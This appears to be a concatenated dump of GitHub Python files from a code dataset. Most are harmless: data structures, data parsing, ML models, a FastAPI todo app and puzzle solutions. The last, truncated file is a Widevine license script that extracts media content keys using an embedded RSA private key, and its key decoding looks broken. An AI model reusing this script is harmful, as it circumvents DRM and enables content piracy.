\n# Let us create a unsorted linked list \n# to test the functions created. \n# The list shall be a: 2->3->20->5->10->15 \nli.append(5) \nli.append(20)\nli.append(10) \nli.append(2) \nli.append(15) \nli.append(3)\n \n# Apply merge Sort \nprint('before sort')\nprintList(li.head) \nli.head = li.merge_sort(li.head) \n\nprint (\"Sorted Linked List is:\") \nprintList(li.head) \n","repo_name":"subhaminion/Journey","sub_path":"ds/linked_list/merge_sort_on_linked_list.py","file_name":"merge_sort_on_linked_list.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23914063016","text":"# Henry Barth\r\n# Start Date: 7.17.2022\r\n# Project: Constants Used in the GUI main file\r\n\r\n# Constants\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nWINDOW_WIDTH = 760\r\nWINDOW_HEIGHT = 640\r\nFPS = 30\r\nBUTTON_WIDTH = 100\r\nX_LOCATION = (WINDOW_WIDTH / 2) - (BUTTON_WIDTH / 2)\r\n","repo_name":"HDavidBarth/LTAP_test","sub_path":"Barth.Henry_LTAP/modules/CONSTANTS.py","file_name":"CONSTANTS.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37839870129","text":"import json\nimport csv\nfrom datetime import datetime, timedelta\nimport pytz\nimport xlrd\n# import pandas as pd\n\nstart_year = 2000\nend_year = 2020\n\noutput_timezone = pytz.timezone('US/Eastern')\n\nfields = ['Year', \n 'Month', \n 'Day', \n 'Hour', \n 'Minute', \n\n 'Car Data',\n\n 'Temperature [C]', \n 'Pressure [hPa]', \n 'Humidity [%]', \n 'Wind Speed [km/h]',\n 'Wind Direction [deg]', \n 'Cloud Cover [%]', \n 'Precipitation Type', \n 'Precipitation Amount [cm]', \n\n 'CO2 ppm',\n 'Std dev CO2',\n 'No. CO2 Measurements'\n ]\n\nif __name__ == '__main__':\n \n with open('data/BU_Weather_1971-2021.json') as file:\n raw_data = json.load(file)\n\n # Set up new data store dict\n weather_data = {}\n\n for row in raw_data:\n # Set up datetime object for easier management later\n \n time_no_tz = datetime.utcfromtimestamp(int(row.get('dt'))) # No timezone because UTC\n timezone = pytz.timezone('UTC')\n time = timezone.localize(time_no_tz).astimezone(output_timezone)\n\n temp = row.get('main').get('temp')\n temp_low = row.get('main').get('temp_min')\n temp_high = row.get('main').get('temp_max')\n temp_feels = row.get('main').get('feels_like')\n\n pressure = row.get('main').get('pressure')\n humidity = row.get('main').get('humidity')\n\n wind_speed = row.get('wind').get('speed') * 3.6\n wind_direction = row.get('wind').get('deg')\n \n cloud_cover = row.get('clouds').get('all')\n\n rain_obj = row.get('rain')\n snow_obj = row.get('snow')\n\n if rain_obj is not None:\n precipitation_type = \"rain\"\n if rain_obj.get('1h') is not None:\n precipitation_amount = rain_obj.get('1h') * 10 # mm to cm\n elif rain_obj.get('3h') is not None:\n precipitation_amount = rain_obj.get('3h') * 10 / 3 # Divide by 3 to get avg hourly rate\n else:\n precipitation_amount = 0\n elif snow_obj is not None:\n precipitation_type = \"snow\"\n if snow_obj.get('1h') is not None:\n precipitation_amount = snow_obj.get('1h') * 10 # mm to cm\n elif snow_obj.get('3h') is not None:\n precipitation_amount = snow_obj.get('3h') * 10 / 3 # Divide by 3 to get avg hourly rate\n else:\n precipitation_amount = 0\n else:\n precipitation_type = \"None\"\n precipitation_amount = 0\n\n condition = row.get('weather')[0].get('description')\n\n weather_data[time] = {\n \"temp\": temp,\n \"temp_low\": temp_low,\n \"temp_high\": temp_high,\n \"pressure\": pressure,\n \"humidity\": humidity,\n \"wind_speed\": wind_speed,\n \"wind_direction\": wind_direction,\n \"cloud_cover\": cloud_cover,\n \"precipitation_type\": precipitation_type,\n \"precipitation_amount\": precipitation_amount,\n \"condition\": condition\n }\n\n if time.month == 12 and time.day == 31 and time.hour == 23:\n print(\"Finished parsing \" + time.strftime('%Y'))\n\n co2_data = {}\n\n with open('data/NACP_PROJECT_BU.csv') as csv_file:\n csv_reader = csv.reader(csv_file)\n i = 3\n\n for row in csv_reader:\n if i != 0:\n i -= 1\n continue\n \n # Import time\n time_no_tz = datetime.utcfromtimestamp(int(row[0])) # No timezone because UTC\n timezone = pytz.timezone('UTC')\n time = timezone.localize(time_no_tz).astimezone(output_timezone)\n\n c02 = None if float(row[2]) == -9999 else float(row[2]) \n std_dev = None if float(row[3]) == -9999 else float(row[3])\n n = None if int(row[4]) == -9999 else int(row[4])\n\n uncertainty = int(row[5])\n lat = float(row[6])\n longitude = float(row[7])\n elevation = float(row[8])\n inlet_height = float(row[9])\n \n co2_data[time] = {\n 'co2_ppm': c02,\n 'std_dev': std_dev,\n 'num_of_measurements': n\n }\n\n car_data = {}\n\n y = 2016\n m = 11\n\n y_final = 2020\n m_final = 12\n\n while y != y_final or m != m_final:\n if m == 12:\n m = 1\n y += 1\n else:\n m += 1\n\n file_name = f\"data/car_data/MonthlyVolumeReport_AET13_{m}_{y}.xlsx\" \n\n wb = xlrd.open_workbook(file_name)\n sheet = wb.sheet_by_index(0)\n\n data = []\n\n for i in range(10, sheet.nrows):\n data.append(sheet.row_values(rowx=i, start_colx=1, end_colx=25))\n\n for row in range(len(data)):\n for col in range(len(data[row])):\n date = datetime(year=y, month=m, day=row+1, hour=col)\n car_data[output_timezone.localize(date)]= data[row][col]\n \n final_data = []\n final_data.append(fields)\n\n for key, value in car_data.items():\n year = key.year\n month = key.month\n day = key.day\n hour = key.hour\n minute = key.minute\n\n car_num = value\n\n weather = weather_data[key + timedelta(hours=-1)]\n\n co2 = co2_data.get(key, {})\n \n final_data.append([\n year,\n month,\n day,\n hour,\n minute,\n car_num,\n weather.get('temp'),\n weather.get('pressure'),\n weather.get('humidity'),\n weather.get('wind_speed'),\n weather.get('wind_direction'),\n weather.get('cloud_cover'),\n weather.get('precipitation_type'),\n weather.get('precipitation_amount'),\n co2.get('co2_ppm'),\n co2.get('std_dev'),\n co2.get('num_of_measurements')\n ])\n \n with open('final_data.csv', 'w') as file:\n write = csv.writer(file)\n write.writerows(final_data)\n","repo_name":"alextac98/openweather-parser","sub_path":"OpenWeather-Parser.py","file_name":"OpenWeather-Parser.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25664682730","text":"\n# TESTE SOBRE UM VIDEOO NOVO PARA PROCESSO DE CONSTRUÇÃO DAS PASTAS A SEREM USADAS\n# NA VISUALIZAÇÃO DOS RESULTADOS\n\n# =================================================================================\n# Imports ...\n# =================================================================================\nimport testDatasetConstructor\nimport testDatasetConstructorWithoutLabels\nfrom additional.videoProcessing import *\nfrom additional.constants import *\nfrom additional.processCsvFile import *\nfrom additional.directoryManipulator import *\nimport testDatasetConstructor\n\n\n# =================================================================================\n# generate dataset from new/test data...\n# =================================================================================\n\n\ndef generate_video_dataset():\n\n # hyper parameters\n nog = NOG # number of groups\n spr = SPG # samples per group\n nof = NOF # number of features\n noss = NOSS # number of shifted samples\n\n clear_dir(TEST_AUDIO_PATH)\n\n file_rows = list()\n\n CsvFile.remove_file(\"../\" + TEST_DIR_PATH + \"/\" + TEST_DATASET_PATH)\n features_file = CsvFile(TEST_DIR_PATH + \"/\" + TEST_DATASET_PATH, \"w\")\n\n paths_train = [TEST_VIDEO_PATH, TEST_AUDIO_PATH]\n\n # make sure that the 'test/test_videos' directory have just ONE video\n if len(np.array(list(os.listdir(\"test_videos\")))) > 1:\n print(\"Directory 'test/test_videos' CAN ONLY HAVE one video.\")\n exit(0)\n\n # in constants.py change LABELS value to \"True\" in case you want Supervised classification\n if LABELS:\n testDatasetConstructor.construct(paths_train, nog, spr,\n noss, features_file, file_rows)\n else:\n testDatasetConstructorWithoutLabels.construct(paths_train, nog, spr,\n noss, features_file, file_rows)\n\n\nif __name__ == \"__main__\":\n generate_video_dataset()\n","repo_name":"carina-haaf/PRJ_47_45118","sub_path":"03_Implementacao/projetos/prj_python/test/generateTestVideoDataset.py","file_name":"generateTestVideoDataset.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45022027557","text":"import os\r\nimport random\r\nimport binascii\r\nfrom colorama import init, Fore\r\n\r\nos.system(\"cls || clear\") \r\ninit()\r\nbanner = Fore.RED + f\"\"\"\r\n _ _ _______ _ _ \r\n /\\ (_|_) |__ __| | | | | \r\n / \\ ___ ___ _ _ | | ___ | |__| | _____ __\r\n / /\\ \\ / __|/ __| | | | |/ _ \\ | __ |/ _ \\ \\/ /\r\n / ____ \\\\\\\\__ \\ (__| | | | | (_) | | | | | __/> < \r\n /_/ \\_\\___/\\___|_|_| |_|\\___/ |_| |_|\\___/_/\\_\\\\ \r\n \r\n By : @Unknown-user-dev \r\n https://github.com/Unknown-user-dev\r\n Idea of my teacher thanks you, I redid the code\r\n\"\"\"\r\n\r\nprint(banner)\r\n\r\ndef menu():\r\n print(Fore.GREEN + \"\"\"\r\n [1] Convert Ascii to Hex\r\n [2] Credits\r\n [3] Exit\r\n \"\"\")\r\n choice = input(Fore.BLUE + \"Your choice : \" + Fore.WHITE)\r\n if choice not in [\"1\", \"2\", \"3\"]:\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.RED + \"Please enter a valid choice\" + Fore.WHITE)\r\n menu()\r\n\r\n if choice == \"2\":\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.GREEN + \"By : @Unknown-user-dev | github.com/Unknown-user-dev | >_Unknown User#8624 | Student of Lycée Robespierre 2TNE\" + Fore.WHITE)\r\n menu()\r\n elif choice == \"3\":\r\n print(Fore.RED + \"Bye !\" + Fore.WHITE)\r\n exit()\r\n if choice == \"1\":\r\n os.system(\"cls || clear\")\r\n name = input(Fore.GREEN + \"Enter your name : \" + Fore.WHITE)\r\n note = 0\r\n while True:\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.GREEN + f\"Name : {name} | Note : {note}\" + Fore.WHITE)\r\n print(Fore.BLUE + \"Convert the following text to hex\" + Fore.WHITE)\r\n word = \"\"\r\n for i in range(10): word += random.choice(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\") # my teacher who told me that I had forgotten the capital letters ;(\r\n print(Fore.RED + word + Fore.WHITE)\r\n print(Fore.GREEN + \"Your answer : \" + Fore.WHITE, end=\"\")\r\n answer = input()\r\n if answer == binascii.hexlify(word.encode()).decode(): note += 0.5\r\n else: note -= 1\r\n if note >= 40: # The rating system was fixed by my friend @NotFubukIl\r\n os.system(\"cls || clear\")\r\n print(banner)\r\n print(Fore.GREEN + f\"Name : {name} | Note : {note}\" + Fore.WHITE)\r\n print(Fore.GREEN + \"Good job You have 40 Points!\" + Fore.WHITE)\r\n exit()\r\n\r\n \r\nif __name__ == \"__main__\": menu()\r\n","repo_name":"Unknown-user-dev/Ascii-To-Hex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"10022026077","text":"# -*- codeing = utf-8 -*-\n#@Time :2020/12/19 16:04\n#@Author :张士澜\n#@File :KNN.py\n#@Software :PyCharm\n\nimport numpy as np\nimport operator\n\nclass KNN(object):\n\n def __init__(self,k = 3):\n self.k = k\n\n def fit(self,x,y):\n self.x = x\n self.y = y\n\n def _square_distance(self,v1,v2):\n return np.sum(np.square(v1-v2))\n\n def _vote(self,ys):\n ys_unique = np.unique(ys)\n vote_dic = {}\n for y in ys:\n if y not in vote_dic.keys():\n vote_dic[y] = 1\n else:\n vote_dic[y] += 1\n sorted_vote_dict = sorted(vote_dic.items(),key = operator.itemgetter(1),reverse = True)\n return sorted_vote_dict[0][0]\n\n def predict(self,x):\n y_pred = []\n for i in range(len(x)):\n dist_arr = [self._square_distance(x[i],self.x[j]) for j in range(len(self.x))]\n sorted_index = np.argsort(dist_arr)\n top_k_index = sorted_index[:self.k]\n y_pred.append(self._vote(ys = self.y[top_k_index]))\n return np.array(y_pred)\n\n def score(self,y_ture = None,y_pred = None):\n if y_ture is None or y_pred is None:\n pred = self.predict(self.x)\n y_ture = self.y\n score = 0.0\n for i in range(len(y_ture)):\n if y_ture[i] == y_pred[i]:\n score += 1\n score /= len(y_ture)\n return score","repo_name":"zhangshilan/python_demo","sub_path":"KNN_test/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30204116913","text":"# Implements a Convolutional GRU Cell\n# Code almost copied from https://github.com/jacobkimmel/pytorch_convgru/blob/master/convgru.py\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch.nn import init\n\n\nclass ConvGRUCell(nn.Module):\n \"\"\"\n Generate a convolutional GRU cell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, kernel_size, act_fn):\n super().__init__()\n padding = kernel_size // 2\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.reset_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)\n self.update_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)\n self.out_gate = nn.Conv2d(input_size + hidden_size, hidden_size, kernel_size, padding=padding)\n self.act_fn = act_fn\n\n init.orthogonal(self.reset_gate.weight)\n init.orthogonal(self.update_gate.weight)\n init.orthogonal(self.out_gate.weight)\n init.constant(self.reset_gate.bias, 0.)\n init.constant(self.update_gate.bias, 0.)\n init.constant(self.out_gate.bias, 0.)\n\n\n def forward(self, input_, prev_state):\n\n # get batch and spatial sizes\n batch_size = input_.data.size()[0]\n spatial_size = input_.data.size()[2:]\n\n # generate empty prev_state, if None is provided\n if prev_state is None:\n state_size = [batch_size, self.hidden_size] + list(spatial_size)\n if torch.cuda.is_available():\n prev_state = Variable(torch.zeros(state_size)).cuda()\n else:\n prev_state = Variable(torch.zeros(state_size))\n\n # data size is [batch, channel, height, width]\n stacked_inputs = torch.cat([input_, prev_state], dim=1)\n update = F.sigmoid(self.update_gate(stacked_inputs))\n reset = F.sigmoid(self.reset_gate(stacked_inputs))\n out_inputs = self.act_fn(self.out_gate(torch.cat([input_, prev_state * reset], dim=1)))\n new_state = prev_state * (1 - update) + out_inputs * update\n\n return new_state\n\n\nclass ConvGRU(nn.Module):\n\n def __init__(self, input_size, hidden_size, \n kernel_size, timesteps,\n nl='tanh'):\n '''\n Generates a multi-layer convolutional GRU.\n Preserves spatial dimensions across cells, only altering depth.\n\n Parameters\n ----------\n input_size : integer. depth dimension of input tensors.\n hidden_sizes : integer or list. depth dimensions of hidden state.\n if integer, the same hidden size is used for all cells.\n kernel_sizes : integer or list. sizes of Conv2d gate kernels.\n if integer, the same kernel size is used for all cells.\n n_layers : integer. number of chained `ConvGRUCell`.\n '''\n\n super(ConvGRU, self).__init__()\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.kernel_size = kernel_size\n self.timesteps = timesteps\n if nl == 'tanh':\n self.act_fn = nn.Tanh()\n elif nl == 'relu':\n self.act_fn = nn.ReLU()\n else:\n raise ValueError('Unknown non-linearity')\n self.cell = ConvGRUCell(self.input_size, self.hidden_size, self.kernel_size, self.act_fn)\n\n def forward(self, input):\n '''\n Parameters\n ----------\n input : 4D input tensor. (batch, channels, height, width).\n hidden : list of 4D hidden state representations. (batch, channels, height, width).\n\n Returns\n -------\n upd_hidden : 5D hidden representation. (layer, batch, channels, height, width).\n '''\n batch_size, _, height, width = input.size()\n hidden = torch.zeros(batch_size, self.hidden_size, height, width).to(input.device)\n\n upd_hidden = []\n print(self.timesteps, \"timesteps\")\n for _ in range(self.timesteps):\n # pass through layer\n hidden = self.cell(input, hidden)\n\n # retain tensors in list to allow different hidden sizes\n return hidden\n","repo_name":"vijayvee/pathfinder","sub_path":"models/convgru.py","file_name":"convgru.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26951874636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 11 15:35:12 2019\n\n@author: ediberto\n\"\"\"\n\n#%%\ndef getListOfFiles(dirName):\n # create a list of file and sub directories \n # names in the given directory \n listOfFile = os.listdir(dirName)\n allFiles = list()\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory \n if os.path.isdir(fullPath):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n \n return allFiles \n######################################################################################\n\ndef EnergyPercent(Ac,Dc,Original):\n \n E=np.empty((1,np.size(Dc,1)+1),float)\n Ep=np.zeros((1,np.size(Dc,1)+1),float)\n \n Et=np.sum(np.square(Original))\n \n for i in range(0,np.size(Dc,1)):\n E[0,i]=np.sum(np.square(Dc[0,i]))\n \n E[0,i+1]=np.sum(np.square(Ac))\n\n\n Ep=E/Et;\n \n return Ep;\n\n \n\n#######################################################################################\n#Ler amostra do arquivo\npath='C:\\corrente_10khz_10s_filtrado'\n #Confgurar caminho para pasta contendo as amostras\n\nFiles=getListOfFiles(path); \n\namostra=np.empty((100000), float);\n\nN_decomp_levels=5 #Configurar níveis de decomposição aqui\n\nn=N_decomp_levels+2\n\nnCols=(n-1)*6+3\n\nDataBase=np.zeros((len(Files),nCols),float);\n\nx_array=[10] #Configurar quantas amostras devem ser \"saltadas\" para subamostragem\n\n\n\nfor x_idx in range(0,len(x_array)):\n\n #for i in range(0, len(Files)):\n for i in range(0, len(Files)):\n fp=open(Files[i])\n\n content=fp.readlines();\n x = np.array(content[0:])\n\n for j in range(0,100000):\n #amostra_strings=x[j].split(',');\n amostra[j]=np.array(x[j]);\n\n #####################################################################################\n \n # Remover a media\n #mean=np.mean(amostra) \n #amostra=amostra-mean; \n\n x=x_array[x_idx];\n #Filtragem digital\n fs=10000;\n fc =fs/(2*x)-300 ; # Cut-off frequency of the filter \n w = fc / (fs / 2) # Normalize the frequency\n b, a = signal.butter(5, w, 'low')\n output = amostra\n\n #Subamostragem\n t=10 # Configurar tempo total em segundos da amostra cortada\n n_pontos=int(t*10000)\n\n fluxo=output[0:n_pontos:x]\n #print(len(fluxo))\n\n input=fluxo;\n \n Desvio=np.zeros((1,n-1),float)\n MeanAD=np.zeros((1,n-1),float)\n MedianAD=np.zeros((1,n-1),float)\n Energia=np.zeros((1,n-1),float)\n Kurtosis=np.zeros((1,n-1),float)\n Skewness=np.zeros((1,n-1),float)\n cD=np.empty((1,n-2),object)\n \n for m in range(0,n-2):\n cA, cD[0,m]=pywt.dwt(input,'db2')\n Desvio[0,m]=np.std(cD[0,m])\n MeanAD[0,m]=pd.DataFrame(cD[0,m]).mad()\n MedianAD[0,m]=robust.mad(cD[0,m])\n Kurtosis[0,m]=sc.kurtosis(cD[0,m])\n Skewness[0,m]=sc.skew(cD[0,m])\n input=cA;\n #print(MeanAD) \n #print(cA) \n Desvio[0,m+1]=np.std(cA)\n MeanAD[0,m+1]=pd.DataFrame(cA).mad()\n MedianAD[0,m+1]=robust.mad(cA)\n Kurtosis[0,m+1]=sc.kurtosis(cA)\n Skewness[0,m+1]=sc.skew(cA)\n \n Energia=EnergyPercent(cA,cD,fluxo)\n \n sObject=slice(39,41);\n \n Freq=int(Files[i][sObject]);\n\n sObject=slice(42,44);\n\n Load=int(Files[i][sObject]);\n \n sObject=slice(31,32);\n \n Classe=int(Files[i][sObject]);\n \n sObject=slice(34,38);\n \n Index=int(Files[i][sObject]);\n \n #print(Freq,Load,Classe,Index)\n\n print(i)\n Pattern=np.zeros((1,nCols-3),float)\n np.concatenate((Desvio, MeanAD, MedianAD, Kurtosis, Skewness, Energia),out=Pattern,axis=1)\n \n \n \n DataBase[i,0:nCols-3]=Pattern;\n \n DataBase[i,nCols-3:]= [Freq, Classe,Load]\n \n fp.close()","repo_name":"EdibertoLima/Knn-python","sub_path":"CODIGO PYTHON/sem título1.py","file_name":"sem título1.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13533586962","text":"class Day3:\n rucksacks = []\n\n chars = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n def __init__(self, file):\n self.rucksacks.clear()\n\n with open(file) as f:\n for line in f.readlines():\n self.rucksacks.append(line.removesuffix(\"\\n\"))\n\n def task1(self):\n priority_list = []\n priority_list.clear()\n for pack in self.rucksacks:\n first_compartment = pack[0:int(len(pack) / 2)]\n second_compartment = pack[int(len(pack) / 2):len(pack)]\n for letter in first_compartment:\n if second_compartment.__contains__(letter):\n priority_list.append(self.chars.find(letter) + 1)\n break\n return str(sum(priority_list))\n\n def task2(self):\n priority_list = []\n priority_list.clear()\n for lines in range(0, len(self.rucksacks) - 2, 3):\n for letter in self.rucksacks[lines]:\n if self.rucksacks[lines + 1].__contains__(letter) and self.rucksacks[lines + 2].__contains__(letter):\n priority_list.append(self.chars.find(letter) + 1)\n break\n return str(sum(priority_list))\n","repo_name":"Nicqx/AOC-2022","sub_path":"Days/Day3.py","file_name":"Day3.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30548089818","text":"import streamlit as st \r\nimport enchant\r\n\r\nmessage = st.text_area(\"Enter Text\",\"Type Here ..\")\r\nif st.button(\"Analyze\"):\r\n# Using 'en_US' dictionary \r\n\td = enchant.Dict(\"en_US\") \r\n\tword = message\r\n\td.check(word)\r\n\tdf=d.suggest(word)\r\n\tst.json(df)","repo_name":"Gurukannan/Word_Suggestor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26471402891","text":"from fastapi import FastAPI\nfrom fastapi import HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom database import * \n\norigins = [\"https://jackmaster110.github.io\"] # This will eventually be changed to only the origins you will use once it's deployed, to secure the app a bit more.\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n@app.get(\"/\")\ndef get_root():\n return {\"Ping\": \"Pong\"}\n\n@app.get(\"/api/get-todo/{nanoid}\", response_model=Todo)\nasync def get_one_todo(nanoid):\n todo = await fetch_one_todo(nanoid)\n if not todo: raise HTTPException(404)\n return todo\n\n@app.get(\"/api/get-todo\")\nasync def get_todos():\n todos = await fetch_all_todos()\n if not todos: raise HTTPException(404)\n return todos\n\n@app.post(\"/api/add-todo\", response_model=Todo)\nasync def add_todo(todo: Todo):\n result = await create_todo(todo)\n if not result: raise HTTPException(400)\n return result\n\n@app.put(\"/api/update-todo/{nanoid}\", response_model=Todo)\nasync def update_todo(todo: Todo):\n result = await change_todo(todo.nanoid, todo.title, todo.desc, todo.checked)\n if not result: raise HTTPException(400)\n return result\n\n@app.delete(\"/api/delete-todo/{nanoid}\")\nasync def delete_todo(nanoid):\n result = await remove_todo(nanoid)\n if not result: raise HTTPException(400)\n return result\n","repo_name":"sammysheardev/farm-stack-tut-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31285636792","text":"#!/usr/bin/env python3\n\nimport os \nimport subprocess\nimport shutil\nimport glob\nimport pathlib\nimport platform\nimport time\nimport sys\nimport base64\nimport argparse\nimport socket\nimport binascii\nimport requests\nfrom pathlib import Path\nfrom urllib.request import getproxies\nfrom Cryptodome.Hash import CMAC\nfrom Cryptodome.Hash import SHA1\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.Signature import pss\n\nimport license_protocol_pb2\n\nPRIVATE_KEY = \"MIICXAIBAAKBgQCqGKukO1De7zhZj6+H0qtjTkVxwTCpvKe4eCZ0FPqri0cb2JZfXJ/DgYSF6vUpwmJG8wVQZKjeGcjDOL5UlsuusFncCzWBQ7RKNUSesmQRMSGkVb1/3j+skZ6UtW+5u09lHNsj6tQ51s1SPrCBkedbNf0Tp0GbMJDyR4e9T04ZZwIDAQABAoGAFijko56+qGyN8M0RVyaRAXz++xTqHBLh3tx4VgMtrQ+WEgCjhoTwo23KMBAuJGSYnRmoBZM3lMfTKevIkAidPExvYCdm5dYq3XToLkkLv5L2pIIVOFMDG+KESnAFV7l2c+cnzRMW0+b6f8mR1CJzZuxVLL6Q02fvLi55/mbSYxECQQDeAw6fiIQXGukBI4eMZZt4nscy2o12KyYner3VpoeE+Np2q+Z3pvAMd/aNzQ/W9WaI+NRfcxUJrmfPwIGm63ilAkEAxCL5HQb2bQr4ByorcMWm/hEP2MZzROV73yF41hPsRC9m66KrheO9HPTJuo3/9s5p+sqGxOlFL0NDt4SkosjgGwJAFklyR1uZ/wPJjj611cdBcztlPdqoxssQGnh85BzCj/u3WqBpE2vjvyyvyI5kX6zk7S0ljKtt2jny2+00VsBerQJBAJGC1Mg5Oydo5NwD6BiROrPxGo2bpTbu/fhrT8ebHkTz2eplU9VQQSQzY1oZMVX8i1m5WUTLPz2yLJIBQVdXqhMCQBGoiuSoSjafUhV7i1cEGpb88h5NBYZzWXGZ37sJ5QsW+sJyoNde3xH8vdXhzU7eT82D6X/scw9RZz+/6rCJ4p0=\"\n\nPUBLIC_KEY = \"MIIBCgKCAQEA61BjmfXGEvWmegnBGSuS+rU9soUg2FnODva32D1AqhwdziwHINFaD1MVlcrYG6XRKfkcxnaXGfFDWHLEvNBSEVCgJjtHAGZIm5GL/KA86KDp/CwDFMSwluowcXwDwoyinmeOY9eKyh6aY72xJh7noLBBq1N0bWi1e2i+83txOCg4yV2oVXhBo8pYEJ8LT3el6Smxol3C1oFMVdwPgc0vTl25XucMcG/ALE/KNY6pqC2AQ6R2ERlVgPiUWOPatVkt7+Bs3h5Ramxh7XjBOXeulmCpGSynXNcpZ/06+vofGi/2MlpQZNhHAo8eayMp6FcvNucIpUndo1X8dKMv3Y26ZQIDAQAB\"\n\ndef read_pssh(path: str):\n\traw = Path(path).read_bytes()\n\tpssh_offset = raw.rfind(b'pssh')\n\t_start = pssh_offset - 4\n\t_end = pssh_offset - 4 + raw[pssh_offset-1]\n\tpssh = raw[_start:_end]\n\treturn pssh\n\nclass WidevineCDM:\n\tdef __init__(self, license_url: str):\n\t\tself.private_key = binascii.a2b_hex(PRIVATE_KEY)\n\t\tself.public_key = binascii.a2b_hex(PUBLIC_KEY)\n\t\tself.proxies = getproxies()\n\t\tself.license_url = license_url\n\t\tself.header={\"Cookie\": \"\"}\n\t\t\n\tdef generateRequestData(self, pssh: bytes):\n\t\t_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t_socket.settimeout(1)\n\t\ttry:\n\t\t\t_socket.connect((\"127.0.0.1\", 8888))\n\t\t\t_socket.send(pssh)\n\t\t\trecv = _socket.recv(10240)\n\t\texcept Exception as e:\n\t\t\tprint(f\"socket recv data failed. --> {e}\")\n\t\t\t_socket.close()\n\t\t\treturn\n\t\t_socket.close()\n\t\treturn recv\n\t\n\tdef verify(self, msg: bytes, signature: bytes):\n\n\t\t_hash = SHA1.new(msg)\n\t\tpublic_key = RSA.importKey(self.public_key)\n\t\tverifier = pss.new(public_key)\n\t\tres = verifier.verify(_hash, signature)\n\t\tprint(f\"verify result is --> {res}\")\n\t\t\n\tdef license_request(self, payload):\n\t\ttry:\n\t\t\tr = requests.post(self.license_url, data=payload, headers=self.header, proxies=self.proxies)\n\t\texcept Exception as e:\n\t\t\tsys.exit(f\"request license failed. --> {e}\")\n\t\treturn r.content\n\t\n\tdef getContentKey(self, license_request_data: bytes, license_response_data: bytes):\n\t\tlicenseMessage = license_protocol_pb2.License()\n\t\trequestMessage=license_protocol_pb2.SignedMessage()\n\t\tresponseMessage = license_protocol_pb2.SignedMessage()\n\t\trequestMessage.ParseFromString(license_request_data)\n\t\tresponseMessage.ParseFromString(license_response_data)\n\t\t\n\t\toaep_key = RSA.importKey(self.private_key)\n\t\tcipher = PKCS1_OAEP.new(oaep_key)\n\t\tcmac_key = cipher.decrypt(responseMessage.session_key)\n\t\t\n\t\t_cipher = CMAC.new(cmac_key, ciphermod=AES)\n\t\t_auth_key = b'\\x01ENCRYPTION\\x00' + requestMessage.msg + b\"\\x00\\x00\\x00\\x80\"\n\t\tenc_cmac_key = _cipher.update(_auth_key).digest()\n\t\t\n\t\tlicenseMessage.ParseFromString(responseMessage.msg)\n\t\tglobal KEY_ARRAY\n\t\tKEY_ARRAY=[]\n\t\tfor key in licenseMessage.key:\n\t\t\tcryptos = AES.new(enc_cmac_key, AES.MODE_CBC, iv=key.iv[0:16])\n\t\t\tdkey = cryptos.decrypt(key.key[0:16])\n#\t\t\tprint(\"KID:\", binascii.b2a_hex(key.id).decode('utf-8'), \"KEY:\",binascii.b2a_hex(dkey).decode('utf-8'))\n\t\t\tKEY_ARRAY.append(\"%s:%s\"%(binascii.b2a_hex(key.id).decode('utf-8'),binascii.b2a_hex(dkey).decode('utf-8')))\n\t\tKEY_ARRAY.remove(KEY_ARRAY[0])\n\t\tfor item in 